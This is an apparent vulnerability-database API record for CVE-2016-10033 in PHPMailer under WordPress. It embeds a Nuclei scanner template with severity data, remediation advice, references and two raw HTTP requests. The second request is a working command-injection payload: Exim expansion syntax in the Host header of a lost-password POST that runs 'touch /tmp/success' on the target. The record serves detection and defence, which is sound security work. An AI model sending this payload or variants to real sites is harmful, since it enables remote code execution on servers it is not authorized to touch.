{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2016-10033/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2016-10033/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2016-10033/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2016-10033/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2016-10033/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2016-10033"},"sightings":{"href":"/api/v1/sightings/cve-2016-10033"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2016/CVE-2016-10033.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2016-10033\n\ninfo:\n  name: WordPress PHPMailer < 5.2.18 - Remote Code Execution\n  author: princechaddha\n  severity: critical\n  description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property in isMail transport.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website.\n  remediation: |\n    Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability.\n  reference:\n    - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2016-10033\n    - https://www.exploit-db.com/exploits/40970/\n    - https://www.exploit-db.com/exploits/40968/\n    - http://seclists.org/fulldisclosure/2016/Dec/78\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2016-10033\n    cwe-id: CWE-88\n    epss-score: 0.99714\n    epss-percentile: 0.9995\n    cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: phpmailer_project\n    product: phpmailer\n  tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |+\n        GET /?author=1 HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n      - |+\n        POST /wp-login.php?action=lostpassword HTTP/1.1\n        Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        wp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n    unsafe: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - wp-login.php?checkemail=confirm\n\n      - type: status\n        status:\n          - 302\n\n    extractors:\n      - type: regex\n        name: username\n        group: 1\n        regex:\n          - 'Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>'\n        internal: true\n        part: body\n# digest: 4a0a004730450220495fbe453ce189ee6a83201b847387cedec15ed9ff4fcfb32eeb9e6dc7984fa7022100b37132cc123579b06e5d0b4d60fccd9d9a3b5148b380450539d63950109b81d7:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2016-10033"}